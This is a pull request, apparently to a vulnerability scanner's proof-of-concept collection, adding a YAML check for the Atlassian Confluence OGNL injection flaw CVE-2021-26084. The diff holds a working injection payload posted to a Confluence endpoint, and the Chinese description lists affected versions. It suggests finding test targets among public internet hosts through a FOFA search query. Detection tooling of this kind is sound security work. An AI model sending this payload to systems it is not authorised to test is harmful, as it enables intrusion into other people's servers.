### PR TITLE
Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)

### DIFF
--- a/pocs/atlassian-confluence-rce.yml
+++ b/pocs/atlassian-confluence-rce.yml
@@ -1,0 +1,17 @@
+name: poc-yaml-atlassian-confluence-rce
+set:
+  rand1: randomInt(1000, 9999)
+  rand2: randomInt(400, 9999)
+rules:
+  - method: POST
+    path: "/pages/createpage-entervariables.action"
+    follow_redirects: true
+    body: |
+      queryString=alt3kx\u0027%2b#{{{rand1}}*{{rand2}}}%2b\u0027
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(rand1 * rand2)))
+detail:
+  author: tangshoupu
+  info: Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)
+  links:
+    - https://mp.weixin.qq.com/s/lVCT6JAA_BU9h4ISLlMNbQ


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)
![image](https://user-images.githubusercontent.com/50769953/131684843-e961fa9f-790a-4641-93a8-8a7e4f3b5b06.png)

Atlassian Confluence是一个专业的企业知识管理与协同软件，并支持用于构建企业WiKi

影响范围
Atlassian Confluence Server and Data Center version < 6.13.23
6.14.0 ≤ Atlassian Confluence Server and Data Center version < 7.4.11
7.5.0  ≤ Atlassian Confluence Server and Data Center version < 7.11.5
7.12.0 ≤ Atlassian Confluence Server and Data Center version < 7.12.5


## 测试环境
FOFA找就行了，语法：app="ATLASSIAN-Confluence" 
![image](https://user-images.githubusercontent.com/50769953/131686713-4f42f514-360a-48da-a657-cc6e5b1fcf2d.png)

![image](https://user-images.githubusercontent.com/50769953/131684940-b1b8954e-b98a-4d21-8849-d4e0be6264e9.png)
![image](https://user-images.githubusercontent.com/50769953/131685090-508fd453-e582-4bb0-8334-930a38b1c60d.png)



## 备注
FOFA语法：
app="ATLASSIAN-Confluence" 

